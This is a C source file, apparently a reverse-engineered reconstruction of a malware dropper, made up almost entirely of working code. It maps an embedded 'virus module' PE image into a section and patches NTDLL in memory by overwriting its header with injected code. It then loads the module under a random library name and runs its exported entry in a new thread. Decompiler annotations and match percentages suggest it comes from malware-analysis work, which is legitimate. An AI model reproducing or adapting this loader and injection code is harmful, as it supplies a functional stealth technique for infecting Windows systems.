dropper_CodeBlock.c

1. #include "C. CodeBlock.h"
2. #include "8. AssemblyBlock1.h"
3. #include "9. AssemblyBlock2.h"
4.  
5. #include "config.h"
6.  
7. // 98% (C) CODE MATCH
8. INT32 BLOCK4_InjectAndExecuteVirus(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader)
9. {
10.     HANDLE hThread; // [sp+0h] [bp-98h]@8
11.     HMODULE pVirusModule; // [sp+4h] [bp-94h]@5
12.     HANDLE hMappedAddress; // [sp+8h] [bp-90h]@11
13.     INT32 iResult; // [sp+Ch] [bp-8Ch]@1
14.     PVIRUS_MODULE_BLOCKS_HEADER pVirusModuleSection; // [sp+10h] [bp-88h]@1
15.     PHARDCODED_ADDRESSES pHardAddrs; // [sp+14h] [bp-84h]@1
16.     GENERAL_INFO_BLOCK sInfoBlockCopy; // [sp+18h] [bp-80h]@1
17.  
18.     pVirusModuleSection = (PVIRUS_MODULE_BLOCKS_HEADER)sASMCodeBlocksHeader->VirusModuleSection;
19.     pHardAddrs = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
20.    
21.     BLOCK4_memcpy(&sInfoBlockCopy, pVirusModuleSection, sizeof(GENERAL_INFO_BLOCK));
22.    
23.     sInfoBlockCopy.OriginalAddress = (DWORD)&sInfoBlockCopy ^ X_PTR_KEY;
24.     sInfoBlockCopy.UnknownZero0 = 0;
25.     sInfoBlockCopy.AlignAddressesFunction = sASMCodeBlocksHeader->AlignAddresses;
26.    
27.     iResult = BLOCK4_LoadVirusModuleInfo(pHardAddrs, &sInfoBlockCopy, (PVOID)pVirusModuleSection->VirusModuleSegment.SegmentAddress, pVirusModuleSection->VirusModuleSegment.SegmentSize);
28.     if(iResult) return iResult;
29.    
30.     iResult = BLOCK4_InjectCodeIntoNTDLL(sASMCodeBlocksHeader, pHardAddrs);
31.     if(iResult) return -4;
32.    
33.     pVirusModule = pHardAddrs->LoadLibraryW(sInfoBlockCopy.RandomLibraryName);
34.     if(!pVirusModule) return -9;
35.    
36.     pVirusModuleSection->VirusModulePointer = pVirusModule;
37.     if(pVirusModuleSection->LibraryExecuteEntryNumber != -1)
38.     {
39.         hThread = pHardAddrs->CreateThread(NULL, 0x00080000, (LPTHREAD_START_ROUTINE)sASMCodeBlocksHeader->ExecuteLibrary, sASMCodeBlocksHeader, 0, NULL);
40.        
41.         if(!hThread) return -13;
42.        
43.         pHardAddrs->WaitForSingleObject(hThread, -1);
44.         pHardAddrs->GetExitCodeThread(hThread, (LPDWORD)&iResult);
45.     }
46.    
47.     hMappedAddress = sInfoBlockCopy.MappedAddress;
48.     if(sInfoBlockCopy.MappedAddress)
49.     {
50.         sInfoBlockCopy.MappedAddress = 0;
51.         pHardAddrs->ZwClose(hMappedAddress);
52.     }
53.    
54.     pHardAddrs->UnmapViewOfFile(pVirusModuleSection);
55.     return iResult;
56. }
57.  
58. // 99% (C) CODE MATCH
59. INT32 BLOCK4_ExecuteLibrary(PASM_CODE_BLOCKS_HEADER sASMCodeBlocksHeader)
60. {
61.     FARPROC pLibraryExecEntry; // [sp+0h] [bp-Ch]@1
62.     PVIRUS_MODULE_BLOCKS_HEADER pVirusModuleSection; // [sp+4h] [bp-8h]@1
63.     PHARDCODED_ADDRESSES pHardAddrs; // [sp+8h] [bp-4h]@1
64.  
65.     pVirusModuleSection = (PVIRUS_MODULE_BLOCKS_HEADER)sASMCodeBlocksHeader->VirusModuleSection;
66.     pHardAddrs          = (PHARDCODED_ADDRESSES)(sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress + _SIZE(&g_hardAddrs, __ASM_BLOCK1_0));
67.    
68.     pLibraryExecEntry = pHardAddrs->GetProcAddress(pVirusModuleSection->VirusModulePointer, (LPCSTR)pVirusModuleSection->LibraryExecuteEntryNumber);
69.    
70.     if(pLibraryExecEntry)
71.     {
72.         // Note: Same arguments passed to the 15th function of the internal library, maybe it was another module loaded in the past?
73.         ((__tLibraryExecEntry)pLibraryExecEntry)((LPVOID)pVirusModuleSection->UnknownSegment.SegmentAddress, pVirusModuleSection->UnknownSegment.SegmentSize);
74.         return 0;
75.     }
76.    
77.     pHardAddrs->FreeLibrary(pVirusModuleSection->VirusModulePointer);
78.     return 0;
79. }
80.  
81. // 99% (C) CODE MATCH
82. void BLOCK4_CopyPEHeaderInfo(PGENERAL_INFO_BLOCK sInfoBlock, PIMAGE_NT_HEADERS pImageNT, INT32 iVirusModuleSize)
83. {
84.     sInfoBlock->AbsoluteEntryPoint = pImageNT->OptionalHeader.ImageBase + pImageNT->OptionalHeader.AddressOfEntryPoint;
85.     sInfoBlock->UnknownZero1 = 0;
86.     sInfoBlock->SizeOfStackReserve = pImageNT->OptionalHeader.SizeOfStackReserve;
87.     sInfoBlock->SizeOfStackCommit = pImageNT->OptionalHeader.SizeOfStackCommit;
88.     sInfoBlock->Subsystem = pImageNT->OptionalHeader.Subsystem;
89.     sInfoBlock->MinorSubsystemVersion = pImageNT->OptionalHeader.MinorSubsystemVersion;
90.     sInfoBlock->MajorSubsystemVersion = pImageNT->OptionalHeader.MajorSubsystemVersion;
91.     sInfoBlock->UnknownZero2 = 0;
92.     sInfoBlock->Charactersitics = pImageNT->FileHeader.Characteristics;
93.     sInfoBlock->DllCharacteristics = pImageNT->OptionalHeader.DllCharacteristics;
94.     sInfoBlock->Machine = pImageNT->FileHeader.Machine;
95.     sInfoBlock->UnknownOne = 1;
96.     sInfoBlock->UnknownFour = 4;
97.     sInfoBlock->LoaderFlags = pImageNT->OptionalHeader.LoaderFlags;
98.     sInfoBlock->VirusModuleSize = iVirusModuleSize;
99.     sInfoBlock->UnknownZero3 = 0;
100. }
101.  
102. // 94% (C) CODE MATCH
103. NTSTATUS BLOCK4_AlignAddresses(PIMAGE_DOS_HEADER *pImageDOS)
104. {
105.     DWORD *dwItemAddress; // ST08_4@20
106.     WORD *wTypeOffset; // [sp+8h] [bp-24h]@12
107.     UINT32 iDeltaSizeOfBlock; // [sp+Ch] [bp-20h]@12
108.     UINT32 j; // [sp+10h] [bp-1Ch]@14
109.     PIMAGE_NT_HEADERS pImageNT; // [sp+18h] [bp-14h]@6
110.     DWORD pImageBaseDelta; // [sp+1Ch] [bp-10h]@6
111.     DWORD pImageBase; // [sp+24h] [bp-8h]@4
112.     PIMAGE_BASE_RELOCATION i; // [sp+28h] [bp-4h]@10
113.  
114.     if(!pImageDOS || !*pImageDOS)
115.         return STATUS_ACCESS_VIOLATION;
116.    
117.     pImageBase = (DWORD)pImageDOS;
118.     if((*pImageDOS)->e_magic != MZ_HEADER)
119.         return STATUS_ACCESS_VIOLATION;
120.    
121.     pImageNT = (PIMAGE_NT_HEADERS)(pImageBase + (*pImageDOS)->e_lfanew);
122.     pImageBaseDelta = (DWORD)(pImageBase - pImageNT->OptionalHeader.ImageBase);
123.    
124.     if(pImageBase == pImageNT->OptionalHeader.ImageBase)
125.         return STATUS_SUCCESS;
126.    
127.     pImageNT->OptionalHeader.ImageBase = pImageBase;
128.     if(!pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size)
129.         return STATUS_CONFLICTING_ADDRESSES;
130.    
131.     for(i = (PIMAGE_BASE_RELOCATION)(pImageNT->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress + pImageBase); i->SizeOfBlock; i += i->SizeOfBlock/sizeof(IMAGE_BASE_RELOCATION))
132.     {
133.         iDeltaSizeOfBlock = i->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION);
134.         wTypeOffset = (WORD *)(i + 1);
135.        
136.         if(iDeltaSizeOfBlock % 2)
137.             return STATUS_CONFLICTING_ADDRESSES;
138.        
139.         for(j = 0; j < iDeltaSizeOfBlock / 2; ++j)
140.         {
141.             if((UINT8)((*wTypeOffset / 0x100) / 0x10) != IMAGE_REL_BASED_ABSOLUTE)
142.             {
143.                 if((UINT8)((*wTypeOffset / 0x100) / 0x10) != IMAGE_REL_BASED_HIGHLOW)
144.                     return STATUS_CONFLICTING_ADDRESSES;
145.                
146.                 dwItemAddress = (DWORD *)((*wTypeOffset & 0x0FFF) + i->VirtualAddress + pImageBase);
147.                 *dwItemAddress += pImageBaseDelta;
148.             }
149.            
150.             wTypeOffset++;
151.         }
152.     }
153.    
154.     return 0;
155. }
156.  
157. // 100% (ASM) CODE MATCH
158. __declspec(naked) void BLOCK4_memcpy(void *pDestination, const void *pSource, unsigned int iSize)
159. {
160.     __asm {
161.         push    ebp
162.         mov     ebp, esp
163.         push    esi
164.         push    edi
165.         mov     edi, pDestination
166.         mov     esi, pSource
167.         mov     ecx, iSize
168.         rep movsb
169.         pop     edi
170.         pop     esi
171.         pop     ebp
172.         retn
173.     }
174. }
175.  
176. // 99% (C) CODE MATCH
177. void BLOCK4_CopyDataIntoMapView(PVOID pVirusModule, PIMAGE_NT_HEADERS pImageNT, LPVOID pMapViewOfFile)
178. {
179.     INT32 dwNumberOfSections; // [sp+0h] [bp-Ch]@1
180.     PIMAGE_SECTION_HEADER pImageSections; // [sp+4h] [bp-8h]@1
181.     INT32 dwCurrentSection; // [sp+8h] [bp-4h]@1
182.  
183.     dwNumberOfSections = pImageNT->FileHeader.NumberOfSections;
184.     BLOCK4_memcpy(pMapViewOfFile, pVirusModule, pImageNT->OptionalHeader.SizeOfHeaders);
185.     pImageSections = (PIMAGE_SECTION_HEADER)((DWORD)pImageNT + pImageNT->FileHeader.SizeOfOptionalHeader + sizeof(IMAGE_FILE_HEADER) + sizeof(DWORD));
186.    
187.     // Copy section by section
188.     for(dwCurrentSection = 0; dwCurrentSection < dwNumberOfSections; dwCurrentSection++, pImageSections++)
189.     {
190.         if(pImageSections->SizeOfRawData) // If the section VirtualSize is valid copy the entire section
191.             BLOCK4_memcpy((void *)((DWORD)pMapViewOfFile + pImageSections->VirtualAddress), (const void *)((DWORD)pVirusModule + pImageSections->PointerToRawData), pImageSections->SizeOfRawData);
192.     }
193. }
194.  
195. // 99% (C) CODE MATCH
196. INT32 BLOCK4_InjectCodeIntoNTDLL(ASM_CODE_BLOCKS_HEADER *sASMCodeBlocksHeader, PHARDCODED_ADDRESSES pHardAddrs)
197. {
198.     HMODULE hHandleNTDLL; // [sp+8h] [bp-Ch]@1
199.     void *v4; // [sp+Ch] [bp-8h]@3
200.     DWORD dwOld; // [sp+10h] [bp-4h]@5
201.  
202.     hHandleNTDLL = pHardAddrs->NTDLL_DLL;
203.     if(!pHardAddrs->NTDLL_DLL) return 0;
204.    
205.     v4 = (void *)(hHandleNTDLL + 16);
206.     if(*(_DWORD *)(hHandleNTDLL + 16) == 0xAB49103B) return 0; // Check if the code has been already injected
207.    
208.     if(pHardAddrs->VirtualProtect(hHandleNTDLL, 0x1000, PAGE_EXECUTE_WRITECOPY, &dwOld))
209.     {
210.         BLOCK4_memcpy(v4, (const void *)sASMCodeBlocksHeader->ASMBlock0Segment.SegmentAddress, sASMCodeBlocksHeader->ASMBlock0Segment.SegmentSize); // inject the code
211.         ((void (__thiscall *)(void *))sASMCodeBlocksHeader->ASMBlock1Segment.SegmentAddress)(v4); // __thiscall ignored by compiler
212.         pHardAddrs->FlushInstructionCache((HANDLE)-1, NULL, 0);
213.        
214.         return 0;
215.     }
216.    
217.     return -4;
218. }
219.  
220. // 97% (C) CODE MATCH
221. INT32 BLOCK4_LoadVirusModuleInfo(PHARDCODED_ADDRESSES pHardAddrs, GENERAL_INFO_BLOCK *sInfoBlock, PVOID pVirusModule, INT32 iVirusModuleSize)
222. {
223.     PIMAGE_NT_HEADERS pImageNT; // [sp+0h] [bp-1Ch]@3
224.     LARGE_INTEGER liMaximumSize; // [sp+4h] [bp-18h]@5
225.     NTSTATUS iStatus; // [sp+Ch] [bp-10h]@5
226.     LPVOID pMapViewOfFile; // [sp+10h] [bp-Ch]@7
227.     HANDLE hSectionHandle; // [sp+14h] [bp-8h]@5
228.     PIMAGE_DOS_HEADER pImageDOS; // [sp+18h] [bp-4h]@1
229.  
230.     sInfoBlock->MappedAddress = 0;
231.     pImageDOS = (PIMAGE_DOS_HEADER)pVirusModule;
232.    
233.     if(((PIMAGE_DOS_HEADER)pVirusModule)->e_magic != MZ_HEADER) return -2;
234.    
235.     pImageNT = (PIMAGE_NT_HEADERS)((DWORD)pVirusModule + pImageDOS->e_lfanew);
236.     if(pImageNT->Signature != PE_HEADER) return -2;
237.    
238.     liMaximumSize.LowPart  = pImageNT->OptionalHeader.SizeOfImage; // 0x00006000
239.     liMaximumSize.HighPart = 0;
240.    
241.     // ZwCreateSection(..., 0xF001F, 0, ..., 64, 0x8000000, 0)
242.     iStatus = pHardAddrs->ZwCreateSection(&hSectionHandle, SECTION_ALL_ACCESS, 0, &liMaximumSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, 0);
243.     if(iStatus != STATUS_SUCCESS) return -11;
244.    
245.     pMapViewOfFile = pHardAddrs->MapViewOfFile(hSectionHandle, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, 0);
246.     if(!pMapViewOfFile)
247.     {
248.         pHardAddrs->ZwClose(hSectionHandle);
249.         return -10;
250.     }
251.    
252.     sInfoBlock->MappedAddress = hSectionHandle;
253.     BLOCK4_CopyDataIntoMapView(pVirusModule, pImageNT, pMapViewOfFile);
254.     BLOCK4_CopyPEHeaderInfo(sInfoBlock, pImageNT, iVirusModuleSize);
255.    
256.     pHardAddrs->UnmapViewOfFile(pMapViewOfFile);
257.    
258.     return 0;
259. }
260.  
261. // 100% (ASM) CODE MATCH
262. void BLOCK4_END(void)
263. {
264.     ;
265. }